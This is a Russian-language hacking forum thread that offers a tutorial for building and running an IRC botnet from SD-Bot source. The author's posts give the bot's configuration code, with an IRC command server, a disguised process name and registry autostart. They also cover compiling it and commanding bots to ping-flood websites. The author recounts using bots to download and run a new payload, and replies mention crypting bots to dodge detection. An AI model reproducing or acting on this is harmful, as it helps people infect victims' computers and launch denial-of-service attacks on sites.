PDA

Просмотр полной версии : Делаем IRC ботнет

ZoRKeG
25.12.2012, 01:00
Статья возможно будет не интересна для продвинутых но для новичком она окажется весьма познавательной , да-да, знаю, IRC ботнеты не так актуальные как HTTP, но я расскажу как его можно умно использовать.

Небольшой эпизод из жизни ботнета.
Был у меня такой случай, накатали абузы на HTTP ботнет, а точнее, сайт на котором был ботнет и в итоге его заблокировали, спустя некоторое время мне ну очень сильно понадобилось повысить нагрузку на сайт, ботнета с нормальным количеством ботов у меня не было, но тут я вспомнил, что давненько был создавал IRC ботнет, решил его проверить и удивился, там были боты После я использовал команду загрузки ботами файла и дальнейшего его запуска, загрузил я им так бота на ново созданный HTTP ботнет, захожу в админку и всё прошло успешно, в итоге у меня хватило ботов, что бы жестко повысить нагрузку на сайт.

Теперь приступим к делу!
Что же нам понадобится?
1) IRC канал, на нем будут сидеть боты.
2) Исходник ботнета, я буду использовать SD-Bot 05b
Для регистрации канала нам нужен клиент IRC, допустим MIRC, скачали клиент, установили, запустили и зашли в него, далее добавляем в список IRC серверов следующий сервер: irc.yakimanka.net если нужно ввести порт то вводим 6667.
Подключаемся к каналу, если всё ок то в чат вводим /join #chanel_name
Вместо chanel_name вводим свое имя канала. Если такого канала нету то вы будете в нем одни и возле вашего ника будет стоять @, кстати, вам нужно зарегистрировать ещё и ник иначе вы будете как гость:
/NickServ register password email
password — ваш пароль.
email — ваш e-mail.
Примечание: в настройках клиента вы должны указать ваш ник и после эта команда зарегистрирует ваш ник на вас и ещё одно, когда будете в дальнейшем заходить на этот сервер то в главном окне сервера вам в конца скажут подтвердить ваш ник и для подтверждения вам выведут пример команды.
Теперь вернемся к нашему каналу, если вы главный в этом канале то вводим следующую команду /msg chanserv register chanel_name password description
chanel_name — имя вашего канала.
password — пароль вашего канала.
description — описание вашего канала.
Эта команда зарегистрирует этот канал на вас.
Всё, теперь вы создали свой собственный IRC канал!

Приступим к основной части — настройка и компиляция бота.
Для работы нам нужно скачать lcc-win, скачать который можно по ссылке: lcc-win (https://hpc.name/redirector.html#http://www.cs.virginia.edu/~lcc-win32/)
Пролистав немного ниже можно найти ссылки для скачивания, теперь вам нужен исходник самого бота, скачать его можно тут: SD-Bot (https://hpc.name/redirector.html#http://rghost.ru/42504501) пароль hpc.name
Розархивируйте содержимое архива в отдельную папку и там найдите файл sdbot051b.c — откройте его в любом текстовом редакторе и немного пролистайте вниз где вы и увидите настройки бота, подсказки в комментариях

source:

// bot configuration
const
char
botid[] =
"id"
;
// сюда ввести любое слово/значение
const
char
password[] =
"pass"
;
// пароль на ботов
const
int
maxlogins =
4
;
// maximum number of simultaneous logins
const
char
server[] =
"irc.yakimanka.net"
;
// сервер irc
const
int
port =
6667
;
// порт сервера
const
char
serverpass[] =
"pass"
;
// пароль сервера( на irc.yakimanka.net можно оставить пустым)
const
char
channel[] =
"#chanel_name"
;
// имя канала куда будут подключаться боты
const
char
chanpass[] =
""
;
// пароль канала, тоже можно оставить пустым
const
char
server2[] =
"irc.yakimanka.net"
;
// запасной сервер
const
int
port2 =
6667
;
// порт запасного сервера
const
char
channel2[] =
""
;
// запасной канала
const
char
chanpass2[] =
"pass"
;
//пароль запасного канала
const
BOOL
topiccmd =
FALSE
;
// set to TRUE to enable topic commands
const
BOOL
rndfilename =
FALSE
;
// use random file name
const
char
filename[] =
"systemconf.exe"
;
// Как будет отображаться процесс бота
const
BOOL
regrun =
TRUE
;
// use the Run registry key for autostart
const
BOOL
regrunservices =
TRUE
;
// use the RunServices registry key for autostart
const
char
valuename[] =
"System Boot Menu"
;
// Значение бота в автозагрузке
const
char
prefix =
'.'
;
// command prefix (one character max.)
const
char
version[] =
"sdbot v0.5b by [sd]"
;
// bot's VERSION reply
const
int
cryptkey =
0
;
// encryption key (not used right now)
const
int
maxaliases =
16
;
// maximum number of aliases (must be greater than the number of predefined aliases).

Сохранили исходник и теперь заходим в lcc-win ( Пуск->Все программы->lcc-win->lcc-win.exe ) в программе откроем наш исходник ( File->Open ), теперь нажмем Compile->Make (F9), на все ошибки кликаем Ок или Add lib
Готово, теперь в папке с исходником появилась папка lcc и там будет лежать наш готовый бот

ZoRKeG
30.03.2013, 01:00
Дополнение к теме.
Что бы начать отдавать команды ботам нужно сначала авторизироваться перед ними, делаем это следующей командой: .login pass
Login - команда авторизации, pass - ваш пароль, который вы указывали в конфигурациях для бота, "." - символ перед командами, указывается тоже в конфигурациях бота, служит для того, чтобы боты могли отличить команды от простых слов.
Пример команды: .ping site-ip 1000 4096 100
Устраивает пинг IP адреса, где site-ip - IP адрес сайта, можно вписывать домен, 4096 - размер пакета. Многие школьники используют эту команду в CMD якобы для DDoS атаки(!).
Остальные команды вы сможете просмотреть в html файле, который находится вместе с исходным кодом в архиве, имя его commandref.html .

OmnikxD
31.03.2013, 01:00
Хорошая статья.

heretic1990
01.04.2013, 01:00
Оригинально, я так понял бот будит обращаться к чатику, а ты просто пишешь туда команду? Только статистику не отследить без админки? или они как нибудь будут отстукиваться?

ZoRKeG
04.04.2013, 01:00
Цитата:

Сообщение от heretic1990

Оригинально, я так понял бот будит обращаться к чатику, а ты просто пишешь туда команду? Только статистику не отследить без админки? или они как нибудь будут отстукиваться?

Да, боты будут сидеть в чате и ждать дальнейших указаний, смотря какой IRC сервер будет возможно где-то и есть функция для админов чтобы просматривать статистику кто и когда заходил, а так можно подключиться к каналу и там сидеть, а ботов можно легко увидеть в списку юзеров, которые сидят в чате, имена ботов будут состоять из N-го количества рандомных символов, все это можно подправить в конфигах

heretic1990
Цитата:

Сообщение от ZoRKeG

Да, боты будут сидеть в чате и ждать дальнейших указаний, смотря какой IRC сервер будет возможно где-то и есть функция для админов чтобы просматривать статистику кто и когда заходил, а так можно подключиться к каналу и там сидеть, а ботов можно легко увидеть в списку юзеров, которые сидят в чате, имена ботов будут состоять из N-го количества рандомных символов, все это можно подправить в конфигах

тогда по теории за такой ботнет отдел "К" не накрячит? ну есть у меня уютный чятик, а эти боты сами зашли))

ZoRKeG
Цитата:

Сообщение от heretic1990

тогда по теории за такой ботнет отдел "К" не накрячит?

Если ботов будет очень много и будут пинговать ими сайты GOV то возможно и накрячит, но поймать ̶з̶л̶о̶у̶м̶ы̶ш̶л̶е̶н̶н̶и̶ к̶а̶ хорошего человека будет все же труднее.
P.S. На сколько мне известно, создателя данного добра уже были ловили и садили etc, читал про это давненько и точной инфы нету...

GSM_Max
30.04.2013, 01:00
Полная лажа тема мертвая, если нужен ботнет пиши своего который не палица..
Паблика это вата для чайников и школоты.

ZoRKeG
Цитата:

Сообщение от GSM_Max

Полная лажа тема мертвая, если нужен ботнет пиши своего который не палица..
Паблика это вата для чайников и школоты.

Судя по тебе ты и есть школота.
Бота в любое время можно закриптовать.

BlackH
Более половины статей и так пишутся для чаиников.
Не было бы подобных манов ты сам бы ни чем не отличался от этих нубозавров.

(anonymous)
15.06.2014, 01:00
капец, не че не понятно, со скринами сделал бы лучше, не че не понятно, куда вводить, как добавить, вводил в чат эти команды еб***е, ху**ю выдает типо not connected to server-не приконектен к серву, бесит!!! Я впервые эту IRC скачал, не умею юзать ее!!

ZoRKeG
Цитата:

Сообщение от (anonymous)

(anonymous)

И так всё на понятном языке написано. Если даже IRC не можешь настроить - забрось это дело, оно тебе не нужно.

(anonymous)
Цитата:

Сообщение от ZoRKeG

И так всё на понятном языке написано. Если даже IRC не можешь настроить - забрось это дело, оно тебе не нужно.

с irc вроде почти разобрался, только возле ника знак @ - это нормаоьно? И дай пжлст исходник из темы

sT1myL
17.06.2014, 01:00
Актуально ещё ?